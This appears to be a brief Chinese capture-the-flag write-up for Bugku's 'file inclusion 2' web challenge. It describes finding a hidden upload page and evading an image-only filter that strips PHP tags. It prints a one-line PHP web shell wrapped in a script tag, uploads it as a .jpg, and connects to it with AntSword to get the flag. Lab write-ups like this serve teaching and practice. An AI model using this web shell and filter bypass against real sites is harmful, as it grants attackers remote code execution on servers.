bugku web 文件包含2

bugku web 文件包含2

 

 

 既然题目为文件包含,说明有文件上传入口被隐藏了,查看源代码

 bugku web 文件包含2

 

 

 发现注释表名存在一个upload.php文件,进入查看,果不其然文件上传入口就在该文件中

bugku web 文件包含2

 

 

由于只支持jpg png gif格式的, 先写一个一句话图片马上传一下,然后抓包改为php后缀

bugku web 文件包含2

 

 

 发现还是无法上传成功,可能是后端代码进行了绕过,先不更改后缀直接传jpg格式的文件,上传成功后进行访问

bugku web 文件包含2

 

 

 

发现<?php  ?>标签被替换成_了,所以无法解析成php文件,这里我们可以使用另一种姿势来写一句话木马

<script language=php>eval($_POST['shell']);</script>

写好后直接用以jpg格式上传,上传成功后使用蚁剑连接,flag就在根目录下

bugku web 文件包含2

 

上一篇:Bugku,Misc:隐写


下一篇:Bugku,Web:字符,正则